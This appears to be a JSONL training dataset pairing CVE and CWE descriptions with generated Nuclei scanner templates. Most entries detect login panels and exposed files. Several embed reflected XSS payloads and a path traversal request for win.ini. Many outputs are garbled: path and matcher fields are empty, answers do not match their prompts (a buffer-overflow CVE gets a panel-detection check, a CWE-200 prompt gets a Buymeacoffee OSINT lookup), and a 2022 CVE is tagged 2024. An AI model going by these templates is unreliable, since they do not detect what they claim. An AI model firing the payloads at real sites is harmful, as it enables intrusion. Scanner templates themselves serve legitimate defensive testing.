sauter-moduwebvision-panel\n\ninfo:\n name: SAUTER moduWeb Vision Panel - Detect\n author: righettod\n severity: info\n description: Sauter moduWeb Vision was detected.\n tags: panel,moduweb,sauter,login,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/login\" \n matchers:\n - type: word\n words:\n - \"SAUTER moduWeb Vision\" \n part: body\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "sauter-moduwebvision-panel"} +{"instruction": "Generate a Nuclei template for: Backup Directory Listing - Detect", "input": "Title: Backup Directory Listing - Detect\nSummary: Backup Directory Listing - Detect. Backup Directory Listing folder was detected.\n\nVulnerability Type: Security Check\nSeverity: low\nIndicators: vulnerability detected", "output": "id: backup-directory-listing\n\ninfo:\n name: Backup Directory Listing - Detect\n author: DhiyaneshDK\n severity: low\n description: Backup Directory Listing folder was detected.\n tags: hackerone,backups,exposure,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/backup/\" \n - \"{{BaseURL}}/php/backup/\" \n matchers:\n - type: regex\n part: body\n - type: status\n status:\n - 200", "category": "generic", "severity": "low", "id": "backup-directory-listing"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: bitbucket-oauth-exposure\n\ninfo:\n name: Bitbucket OAuth Credentials Exposure\n author: TheZakMan\n severity: high\n description: Detects exposed auth.json files containing Bitbucket OAuth credentials\n tags: exposure,bitbucket,oauth,credentials,misconfig,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/auth.json\" \n - \"{{BaseURL}}/.auth.json\" \n - \"{{BaseURL}}/config/auth.json\" \n - \"{{BaseURL}}/configs/auth.json\" \n - \"{{BaseURL}}/configuration/auth.json\" \n - \"{{BaseURL}}/api/auth.json\" \n - \"{{BaseURL}}/app/auth.json\" \n - \"{{BaseURL}}/assets/auth.json\" \n - \"{{BaseURL}}/data/auth.json\" \n - \"{{BaseURL}}/files/auth.json\" \n - \"{{BaseURL}}/public/auth.json\" \n - \"{{BaseURL}}/static/auth.json\" \n - \"{{BaseURL}}/uploads/auth.json\" \n - \"{{BaseURL}}/backup/auth.json\" \n - \"{{BaseURL}}/backups/auth.json\" \n - \"{{BaseURL}}/tmp/auth.json\" \n - \"{{BaseURL}}/temp/auth.json\" \n - \"{{BaseURL}}/cache/auth.json\" \n - \"{{BaseURL}}/logs/auth.json\" \n - \"{{BaseURL}}/admin/auth.json\" \n - \"{{BaseURL}}/administrator/auth.json\" \n - \"{{BaseURL}}/src/auth.json\" \n - \"{{BaseURL}}/source/auth.json\" \n - \"{{BaseURL}}/www/auth.json\" \n - \"{{BaseURL}}/web/auth.json\" \n - \"{{BaseURL}}/site/auth.json\" \n - \"{{BaseURL}}/sites/auth.json\" \n - \"{{BaseURL}}/private/auth.json\" \n - \"{{BaseURL}}/secure/auth.json\" \n - \"{{BaseURL}}/secret/auth.json\" \n - \"{{BaseURL}}/secrets/auth.json\" \n - \"{{BaseURL}}/env/auth.json\" \n - \"{{BaseURL}}/environment/auth.json\" \n - \"{{BaseURL}}/test/auth.json\" \n - \"{{BaseURL}}/tests/auth.json\" \n - \"{{BaseURL}}/dev/auth.json\" \n - \"{{BaseURL}}/development/auth.json\" \n - \"{{BaseURL}}/staging/auth.json\" \n - \"{{BaseURL}}/prod/auth.json\" \n - \"{{BaseURL}}/production/auth.json\" \n - \"{{BaseURL}}/includes/auth.json\" \n - \"{{BaseURL}}/include/auth.json\" \n - \"{{BaseURL}}/lib/auth.json\" \n - \"{{BaseURL}}/libs/auth.json\" \n - \"{{BaseURL}}/library/auth.json\" \n - \"{{BaseURL}}/vendor/auth.json\" \n - \"{{BaseURL}}/vendors/auth.json\" \n - \"{{BaseURL}}/node_modules/auth.json\" \n - \"{{BaseURL}}/storage/auth.json\" \n - \"{{BaseURL}}/database/auth.json\" \n - \"{{BaseURL}}/db/auth.json\" \n - \"{{BaseURL}}/auth/auth.json\" \n - \"{{BaseURL}}/authentication/auth.json\" \n - \"{{BaseURL}}/oauth/auth.json\" \n - \"{{BaseURL}}/keys/auth.json\" \n - \"{{BaseURL}}/credentials/auth.json\" \n - \"{{BaseURL}}/creds/auth.json\" \n matchers:\n - type: word\n words:\n - \"bitbucket-oauth\" \n - \"bitbucket\" \n condition: or\n - type: regex\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for CVE-2023-38040", "input": "Title: Cross-Site Scripting (XSS) in revive-adserver revive_adserver\nSummary: A reflected XSS vulnerability exists in Revive Adserver 5.4.1 and earlier versions..\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: revive-adserver revive_adserver\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-38040\n\ninfo:\n name: Revive Adserver 5.4.1 - Cross-Site Scripting\n author: ritikchaddha\n severity: medium\n description: A reflected XSS vulnerability exists in Revive Adserver 5.4.1 and earlier versions.\n tags: cve,cve2023,revive-adserver,xss,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Revive Adserver\" \n part: body\n - method: GET\n path:\n - \"{{BaseURL}}/www/delivery/al.php?zoneid=1&layerstyle=geocities&closetext=%3Cscript%3Ealert(document.domain);%3C/script%3E\" \n matchers:\n - type: word\n words:\n - \"\" \n part: body\n - type: word\n words:\n - \"text/html\" \n part: content_type\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2023-38040"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: buymeacoffee\n\ninfo:\n name: Buymeacoffee User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Buymeacoffee user name information check was conducted.\n tags: osint,osint-finance,buymeacoffee,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://www.buymeacoffee.com/{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"supporters\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for CVE-2019-8985", "input": "Title: Vulnerability (CWE-306) in netis-systems wf2411_firmware and others\nSummary: On Netis WF2411 with firmware 2.1.36123 and other Netis WF2xxx devices (possibly WF2411 through WF2880), there is a stack-based buffer overflow that does not require authentication. This can cause denial of service (device restart) or remote code execution. This vulnerability can be triggered by a GET request with a long HTTP \"Authorization: Basic\" header that is mishandled by user_auth->user_ok in /bin/boa.\nVulnerability Type: Vulnerability (CWE-306)\nSeverity: critical\nAffected Products: netis-systems wf2411_firmware, netis-systems wf2880_firmware\nIndicators: error, vulnerability detected", "output": "id: netis-router\n\ninfo:\n name: Netis Router Login Panel - Detect\n author: gy741\n severity: info\n description: Netis router login panel was detected.\n tags: panel,login,netis,router,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/login.htm\" \n matchers:\n - type: word\n words:\n - \"AP setup\" \n part: body\n - type: word\n words:\n - \"Server: netis\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2019-8985"} +{"instruction": "Generate a Nuclei template for: Jolokia write to RCE valve", "input": "Title: Jolokia write to RCE valve\nSummary: Jolokia write to RCE valve. RCE in Jolokia < 1.7.1 using AccesLogValve\nVulnerability Type: Security Check\nSeverity: critical\nIndicators: vulnerability detected", "output": "id: jolokia-acceslogvalve-rce\n\ninfo:\n name: Jolokia write to RCE valve\n author: pathtaga\n severity: critical\n description: RCE in Jolokia < 1.7.1 using AccesLogValve\n tags: jolokia,rce,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/jolokia/list\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"\"host=localhost,name=AccessLogValve,type=Valve\"\" \n part: body", "category": "generic", "severity": "critical", "id": "jolokia-acceslogvalve-rce"} +{"instruction": "Generate a Nuclei template for CVE-2024-6924", "input": "Title: SQL Injection in themetechmount truebooker\nSummary: The TrueBooker WordPress plugin before 1.0.3 does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.\nVulnerability Type: SQL Injection\nSeverity: critical\nAffected Products: themetechmount truebooker\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-6924\n\ninfo:\n name: TrueBooker <= 1.0.2 - SQL Injection\n author: s4e-io\n severity: high\n description: The TrueBooker Appointment Booking and Scheduler Plugin. plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 1.0.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n tags: time-based-sqli,wpscan,cve,cve2024,sqli,wp,wp-plugin,wordpress,truebooker,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2024-6924"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: xvr-login\n\ninfo:\n name: XVR Login Panel - Detect\n author: dhiyaneshDK\n severity: info\n description: XVR login panel was detected.\n tags: panel,xvr,dahuasecurity,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/login.rsp\" \n matchers:\n - type: word\n words:\n - \"XVR LOGIN\" \n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for CVE-2024-24329", "input": "Title: OS Command Injection in totolink a3300r_firmware\nSummary: TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain a command injection vulnerability via the enable parameter in the setPortForwardRules function.\nVulnerability Type: OS Command Injection\nSeverity: critical\nAffected Products: totolink a3300r_firmware\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-24329\n\ninfo:\n name: TotoLink Router setPortForwardRules - Command Injection\n author: pussycat0x\n severity: critical\n description: TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain a command injection vulnerability via the enable parameter in the setPortForwardRules function.\n tags: cve,cve2024,totolink,router,toto_link,unauth,intrusive,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2024-24329"} +{"instruction": "Generate a Nuclei template for CVE-2011-5181", "input": "Title: Cross-Site Scripting (XSS) in clickdesk clickdesk_live_support-live_chat_plugin\nSummary: Cross-site scripting (XSS) vulnerability in clickdesk.php in ClickDesk Live Support - Live Chat plugin 2.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cdwidgetid parameter. NOTE: some of these details are obtained from third party information.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: clickdesk clickdesk_live_support-live_chat_plugin\nIndicators: error, vulnerability detected", "output": "id: CVE-2011-5181\n\ninfo:\n name: ClickDesk Live Support Live Chat 2.0 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: A cross-site scripting vulnerability in clickdesk.php in ClickDesk Live Support - Live Chat plugin 2.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cdwidgetid parameter.\n tags: cve2011,cve,wordpress,xss,wp-plugin,clickdesk,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"ClickDesk Live Support - Live Chat\" \n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\" \n matchers:\n - type: word\n words:\n - \"\" \n part: body\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2011-5181"} +{"instruction": "Generate a Nuclei template for: Yacht - Default Login", "input": "Title: Yacht - Default Login\nSummary: Yacht - Default Login. Yacht is a web interface for managing Docker containers. This template detects instances with default admin credentials (admin@yacht.local:pass), which could allow unauthorized access to the Docker environment, potentially leading to container manipulation, data exposure, or even host system compromise.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: yacht-default-login\n\ninfo:\n name: Yacht - Default Login\n author: Fur1na\n severity: high\n description: Yacht is a web interface for managing Docker containers. This template detects instances with default admin credentials (admin@yacht.local:pass), which could allow unauthorized access to the Docker environment, potentially leading to container manipulation, data exposure, or even host system compromise.\n tags: default-login,yacht,misconfig,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"\"access_token\":\" \n - \":\"successful\"\" \n part: body\n condition: and\n - type: word\n words:\n - \"application/json\" \n part: content_type\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "yacht-default-login"} +{"instruction": "Generate a Nuclei template for CVE-2022-24706", "input": "Title: Vulnerability (CWE-1188) in apache couchdb\nSummary: In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without authenticating and gain admin privileges. The CouchDB documentation has always made recommendations for properly securing an installation, including recommending using a firewall in front of all CouchDB installations.\nVulnerability Type: Vulnerability (CWE-1188)\nSeverity: critical\nAffected Products: apache couchdb\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-24706\n\ninfo:\n name: CouchDB Erlang Distribution - Remote Command Execution\n author: Mzack9999,pussycat0x\n severity: critical\n description: In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without authenticating and gain admin privileges.\n tags: cve2022,network,cve,couch,rce,kev,couchdb,apache,tcp,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2022-24706"} +{"instruction": "Generate a Nuclei template for CVE-2023-22518", "input": "Title: Vulnerability (CWE-863) in atlassian confluence_data_center and others\nSummary: All versions of Confluence Data Center and Server are affected by this unexploited vulnerability. This Improper Authorization vulnerability allows an unauthenticated attacker to reset Confluence and create a Confluence instance administrator account. Using this account, an attacker can then perform all administrative actions that are available to\u00a0Confluence instance administrator leading to - but not limited to - full loss of confidentiality, integrity and availability.\u00a0\n\nAtlassian Cloud sites are not affected by this vulnerability. If your Confluence site is accessed via an atlassian.net domain, it is hosted by Atlassian and is not vulnerable to this issue.\nVulnerability Type: Vulnerability (CWE-863)\nSeverity: critical\nAffected Products: atlassian confluence_data_center, atlassian confluence_server\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-22518\n\ninfo:\n name: Atlassian Confluence Server - Improper Authorization\n author: iamnoooob,rootxharsh,pdresearch\n severity: critical\n description: All versions of Confluence Data Center and Server are affected by this unexploited vulnerability. There is no impact to confidentiality as an attacker cannot exfiltrate any instance data.\nAtlassian Cloud sites are not affected by this vulnerability. If your Confluence site is accessed via an atlassian.net domain, it is hosted by Atlassian and is not vulnerable to this issue.\n tags: cve,cve2023,atlassian,confluence,rce,unauth,intrusive,kev,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2023-22518"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: vrealize-hyperic-panel\n\ninfo:\n name: vRealize Hyperic Login Panel - Detect\n author: Charles D\n severity: info\n description: vRealize Hyperic login panel was detected\n tags: login,panel,vrealize,hyperic,detect,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/app/login\" \n matchers:\n - type: word\n words:\n - \"Sign In - Hyperic\" \n part: body\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for: Protractor Configuration Exposure", "input": "Title: Protractor Configuration Exposure\nSummary: Protractor Configuration Exposure. Protractor configuration file was detected.\n\nVulnerability Type: Security Check\nSeverity: low\nIndicators: vulnerability detected", "output": "id: protractor-config\n\ninfo:\n name: Protractor Configuration Exposure\n author: DhiyaneshDK\n severity: low\n description: Protractor configuration file was detected.\n tags: devops,exposure,protractor,config,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/protractor.conf.js\" \n matchers:\n - type: word\n words:\n - \"exports.config\" \n - \"capabilities:\" \n part: body\n condition: and\n - type: word\n words:\n - \"application/javascript\" \n part: header\n - type: status\n status:\n - 200", "category": "generic", "severity": "low", "id": "protractor-config"} +{"instruction": "Generate a Nuclei template for CVE-2022-4295", "input": "Title: Unknown Vulnerability in appjetty show_all_comments\nSummary: The Show All Comments WordPress plugin before 7.0.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against a logged in high privilege users such as admin.\nVulnerability Type: Unknown Vulnerability\nSeverity: medium\nAffected Products: appjetty show_all_comments\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-4295\n\ninfo:\n name: Show all comments < 7.0.1 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: The Show All Comments WordPress plugin before 7.0.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against a logged in high privilege users such as admin.\n tags: cve2022,cve,wpscan,wp,wordpress,wp-plugin,xss,show-all-comments-in-one-page,appjetty,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-admin/admin-ajax.php?action=sac_post_type_call&post_type=\" \n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "medium", "id": "CVE-2022-4295"} +{"instruction": "Generate a Nuclei template for CVE-2024-45388", "input": "Title: Information Disclosure in hoverfly hoverfly\nSummary: Hoverfly is a lightweight service virtualization/ API simulation / API mocking tool for developers and testers. The `/api/v2/simulation` POST handler allows users to create new simulation views from the contents of a user-specified file. This feature can be abused by an attacker to read arbitrary files from the Hoverfly server. Note that, although the code prevents absolute paths from being specified, an attacker can escape out of the `hf.Cfg.ResponsesBodyFilesPath` base path by using `../` segments and reach any arbitrary files. This issue was found using the Uncontrolled data used in path expression CodeQL query for python. Users are advised to make sure the final path (`filepath.Join(hf.Cfg.ResponsesBodyFilesPath, filePath)`) is contained within the expected base path (`filepath.Join(hf.Cfg.ResponsesBodyFilesPath, \"/\")`). This issue is also tracked as GHSL-2023-274.\nVulnerability Type: Information Disclosure\nSeverity: high\nAffected Products: hoverfly hoverfly\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-45388\n\ninfo:\n name: Hoverfly < 1.10.3 - Arbitrary File Read\n author: iamnoooob,rootxharsh,pdresearch\n severity: high\n description: Hoverfly is a lightweight service virtualization/ API simulation / API mocking tool for developers and testers. The /api/v2/simulation POST handler allows users to create new simulation views from the contents of a user-specified file. This feature can be abused by an attacker to read arbitrary files from the Hoverfly server.\n tags: cve,cve2024,hoverfly,lfi,intrusive,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: regex\n condition: and\n - type: word\n words:\n - \"application/json\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2024-45388"} +{"instruction": "Generate a Nuclei template for CVE-2011-5106", "input": "Title: Cross-Site Scripting (XSS) in fractalia flexible_custom_post_type\nSummary: Cross-site scripting (XSS) vulnerability in edit-post.php in the Flexible Custom Post Type plugin before 0.1.7 for WordPress allows remote attackers to inject arbitrary web script or HTML via the id parameter.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: fractalia flexible_custom_post_type\nIndicators: error, vulnerability detected", "output": "id: CVE-2011-5106\n\ninfo:\n name: WordPress Plugin Flexible Custom Post Type < 0.1.7 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: A cross-site scripting vulnerability in edit-post.php in the Flexible Custom Post Type plugin before 0.1.7 for WordPress allows remote attackers to inject arbitrary web script or HTML via the id parameter.\n tags: cve,cve2011,wordpress,xss,wp-plugin,fractalia,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\" \n matchers:\n - type: word\n words:\n - \"\" \n part: body\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2011-5106"} +{"instruction": "Generate a Nuclei template for CVE-2025-6851", "input": "Title: Vulnerability (CWE-918) in pluginrx broken_link_notifier\nSummary: The Broken Link Notifier plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.3.0 via the ajax_blinks() function which ultimately calls the check_url_status_code() function. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.\nVulnerability Type: Vulnerability (CWE-918)\nSeverity: high\nAffected Products: pluginrx broken_link_notifier\nIndicators: error, vulnerability detected", "output": "id: CVE-2025-6851\n\ninfo:\n name: WordPress Broken Link Notifier < 1.3.1 - Unauthenticated SSRF\n author: iamnoooob,pdresearch\n severity: high\n description: The Broken Link Notifier plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.3.0 via the ajax_blinks() function which ultimately calls the check_url_status_code() function. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.\n tags: cve,cve2025,wp-plugin,wordpress,ssrf,oast,unauth,wpscan,broken-link-notifier,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "high", "id": "CVE-2025-6851"} +{"instruction": "Generate a Nuclei template to detect Path Traversal", "input": "Title: Path Traversal (CWE-22)\nSummary: The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. Many file operations are intended to take place within a restricted directory. By using special elements such as \"..\" and \"/\" separators, attackers can escap\nVulnerability Type: Path Traversal\nSeverity: high\nIndicators: unexpected", "output": "id: sofneta-mecdream-pacs-lfi\n\ninfo:\n name: Softneta MedDream PACS Server Premium 6.7.1.1 - Local File Inclusion\n author: 0x_akoko\n severity: high\n description: Softneta MedDream PACS Server Premium 6.7.1.1 is vulnerable to local file inclusion.\n tags: sofneta,lfi,edb,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/pacs/nocache.php?path=%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini\" \n matchers:\n - type: word\n words:\n - \"bit app support\" \n - \"fonts\" \n - \"extensions\" \n part: body\n condition: and", "category": "cwe", "severity": "high", "id": "CWE-22"} +{"instruction": "Generate a Nuclei template for CVE-2022-42475", "input": "Title: Vulnerability (CWE-197) in fortinet fortios and others\nSummary: A heap-based buffer overflow vulnerability [CWE-122]\u00a0in FortiOS SSL-VPN 7.2.0 through 7.2.2, 7.0.0 through 7.0.8, 6.4.0 through 6.4.10, 6.2.0 through 6.2.11, 6.0.15 and earlier and FortiProxy SSL-VPN 7.2.0 through 7.2.1, 7.0.7 and earlier may allow a remote unauthenticated attacker to execute arbitrary code or commands via specifically crafted requests.\nVulnerability Type: Vulnerability (CWE-197)\nSeverity: critical\nAffected Products: fortinet fortios, fortinet fortiproxy\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-42475\n\ninfo:\n name: Fortinet SSL-VPN - Heap-Based Buffer Overflow\n author: 0xhaggis,pszyszkowski,pussycat0x\n severity: critical\n description: A heap-based buffer overflow vulnerability [CWE-122] in FortiOS SSL-VPN (versions 7.2.0 through 7.2.2, 7.0.0 through 7.0.8, 6.4.0 through 6.4.10, 6.2.0 through 6.2.11, 6.0.15 and earlier) and FortiProxy SSL-VPN (versions 7.2.0 through 7.2.1, 7.0.7 and earlier) may allow a remote unauthenticated attacker to execute arbitrary code or commands via specifically crafted requests.\n tags: cve,cve2024,ssl-vpn,vpn,fortios,fortigate,heap-based,bufferoverflow,kev,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/remote/login\" \n - \"{{BaseURL}}/login\" \n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2022-42475"} +{"instruction": "Generate a Nuclei template for: PixelYourSite \u2013 Your smart PIXEL (TAG) & API Manager Detection", "input": "Title: PixelYourSite \u2013 Your smart PIXEL (TAG) & API Manager Detection\nSummary: PixelYourSite \u2013 Your smart PIXEL (TAG) & API Manager Detection\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: wordpress-pixelyoursite\n\ninfo:\n name: PixelYourSite \u2013 Your smart PIXEL (TAG) & API Manager Detection\n author: ricardomaia\n severity: info\n description: PixelYourSite \u2013 Your smart PIXEL (TAG) & API Manager Detection\n tags: tech,wordpress,wp-plugin,top-200,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/pixelyoursite/readme.txt\" \n matchers:\n - type: dsl\n - type: regex\n part: body", "category": "generic", "severity": "info", "id": "wordpress-pixelyoursite"} +{"instruction": "Generate a Nuclei template for: Fortinet FortiDDoS Panel", "input": "Title: Fortinet FortiDDoS Panel\nSummary: Fortinet FortiDDoS Panel. Fortinet FortiDDoS panel was detected.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: fortinet-fortiddos-panel\n\ninfo:\n name: Fortinet FortiDDoS Panel\n author: johnk3r\n severity: info\n description: Fortinet FortiDDoS panel was detected.\n tags: panel,fortinet,fortiddos,login,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"FortiDDoS\" \n part: body\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "fortinet-fortiddos-panel"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: supervpn-detect\n\ninfo:\n name: SuperVPN Login Panel - Detect\n author: organiccrap\n severity: info\n description: SuperVPN login panel was detected.\n tags: panel,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/admin/login.html\" \n matchers:\n - type: word\n words:\n - \"Sign In-SuperVPN\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for CVE-2023-22527", "input": "Title: Vulnerability (CWE-74) in atlassian confluence_data_center and others\nSummary: A template injection vulnerability on older versions of Confluence Data Center and Server allows an unauthenticated attacker to achieve RCE on an affected instance. Customers using an affected version must take immediate action.\n\nMost recent supported versions of Confluence Data Center and Server are not affected by this vulnerability as it was ultimately mitigated during regular version updates. However, Atlassian recommends that customers take care to install the latest version to protect their instances from non-critical vulnerabilities outlined in Atlassian\u2019s January Security Bulletin.\nVulnerability Type: Vulnerability (CWE-74)\nSeverity: critical\nAffected Products: atlassian confluence_data_center, atlassian confluence_server\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-22527\n\ninfo:\n name: Atlassian Confluence - Remote Code Execution\n author: iamnooob,rootxharsh,pdresearch\n severity: critical\n description: A template injection vulnerability on older versions of Confluence Data Center and Server allows an unauthenticated attacker to achieve RCE on an affected instance. Customers using an affected version must take immediate action.\nMost recent supported versions of Confluence Data Center and Server are not affected by this vulnerability as it was ultimately mitigated during regular version updates. However, Atlassian recommends that customers take care to install the latest version to protect their instances from non-critical vulnerabilities outlined in Atlassian\u2019s January Security Bulletin.\n tags: packetstorm,cve,cve2023,confluence,rce,ssti,kev,atlassian,vkev,vuln\n\nhttp:\n - method: GET\n 